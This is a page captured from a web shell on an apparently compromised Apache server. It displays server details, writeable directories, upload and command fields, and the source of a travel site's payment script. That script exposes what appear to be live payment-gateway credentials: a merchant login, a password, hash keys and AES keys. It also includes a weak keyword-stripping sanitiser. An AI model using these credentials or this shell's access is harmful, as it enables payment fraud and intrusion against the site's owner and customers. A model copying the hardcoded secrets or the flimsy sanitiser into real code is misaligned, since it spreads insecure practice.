403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/b2bzend/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/b2bzend/tia-payment-step1.php
<?php
require_once 'cronjob/init.php';
error_reporting(E_ALL);
$TblAgency = new Travel_Model_TblAgency();
$crmcustomerObj = new Travel_Model_CRM_Customer();
$crmagencyleadaccountObj = new Travel_Model_CRM_AgencyLeadAccount();
$agencycustomerObj = new Travel_Model_CRM_AgencyCustomer();
$paymentMdl = new Payment_Model_Payment();
$resultArr = array();
if ($_POST) {
    $ru = "https://globaltravelexchange.com/tia-return.php";
    $ATOMPAYMENTURL = "https://payment.atomtech.in/paynetz/epi/fts";
    $ATOMLOGIN = "539504";
    $ATOMPASS = "f866f584";
    $ATOMPRODID = "TIA";
    $REQHASHKEY = "01517d6fdafd323898";
    $RESPHASHKEY = "a045d430f81b2094b4";
    $AESREQUESTKEY = "EC44A04781B198676F4F86252AC112BC";
    $AESREQUESTIV = "EC44A04781B198676F4F86252AC112BC";
    $AESRESPONSEKEY = "5757820D5E37D1A73E3DC53DC386B9D2";
    $AESRESPONSEIV = "5757820D5E37D1A73E3DC53DC386B9D2";
    $paymentMdl = new Payment_Model_Payment();
    $txncurr = trim("INR");
    $fullName = (isset($_POST['FullName']) && $_POST['FullName'] != '') ? trim($_POST['FullName']) : '';
    $EmailId = isset($_POST['Email']) ? trim($_POST['Email']) : '';
    $MobileNo = isset($_POST['Phone']) ? trim($_POST['Phone']) : '';
    $City = isset($_POST['City']) ? $_POST['City'] : '';
    $Pincode = isset($_POST['Pincode']) ? $_POST['Pincode'] : '';
    $txnid = $websiteURL = isset($_POST['txnid']) ? $_POST['txnid'] : '';
    $Form_ID = isset($_POST['Form_ID']) ? $_POST['Form_ID'] : '369FB021-CF12-4627-AD0A-3C43AADA940A';
    #file_put_contents("/var/www/html/b2bzend/public/data/tia/" . $websiteURL . '_request.txt', json_encode($_POST));
    if ($Form_ID == '369FB021-CF12-4627-AD0A-3C43AADA940A') {
        $amount = 4720;
    }else {
        $amount = 29500;
    }
    $AgencySysId = 21;
    $companyName = $AgencySysId;
    $login = trim($ATOMLOGIN);
    $pass = trim($ATOMPASS);
    $ttype = trim("NBFundTransfer");
    $prodid = trim($ATOMPRODID);
    $signatureVal = $login . $pass . $ttype . $prodid . $txnid . $amount . $txncurr;
    $signature = hash_hmac("sha512", $signatureVal, $REQHASHKEY, false);
    $datenow = date("d/m/Y h:m:s");
    $modifiedDate = str_replace(" ", "%20", $datenow);
    $postFields = "";
    $postFields .= "&login=$login";
    $postFields .= "&pass=$pass";
    $postFields .= "&ttype=$ttype";
    $postFields .= "&prodid=$prodid";
    $postFields .= "&amt=$amount";
    $postFields .= "&txncurr=$txncurr";
    $postFields .= "&txnscamt=0";
    $postFields .= "&signature=$signature";
    $postFields .= "&clientcode=" . urlencode(base64_encode($AgencySysId));
    $postFields .= "&txnid=" . $txnid;
    $postFields .= "&date=" . $modifiedDate;
    $postFields .= "&custacc=123456789";
    $postFields .= "&udf1=$fullName";
    $postFields .= "&udf2=$EmailId";
    $postFields .= "&udf3=$MobileNo";
    $postFields .= "&udf8=$Pincode";
    $postFields .= "&udf4=$City";
    $postFields .= "&udf9=$websiteURL";
    $postFields .= "&ru=$ru";
    $postString = substr($postFields, 1);
    $encryptedData = new Travel_Model_AtomAES();
    $encryptedVal = strtoupper($encryptedData->encrypt($postString, $AESREQUESTKEY, $AESREQUESTIV));
    $sendUrl = $ATOMPAYMENTURL . "?login=$login&encdata=" . $encryptedVal . "\n";
    header("Location: " . $sendUrl);
    exit;
} else {
    echo "Please use post method";
    exit;
}

function sanitize_data($input_data) {
    $searchArr = array("document", "write", "alert", "%", "$", ";", "+", "|", "#", "<", ">", "\'");
    $input_data = str_replace("script", "", $input_data);
    $input_data = str_replace("iframe", "", $input_data);
    $input_data = str_replace($searchArr, "", $input_data);
    return htmlentities(stripslashes($input_data), ENT_QUOTES);
}

Youez - 2016 - github.com/yon3zu
LinuXploit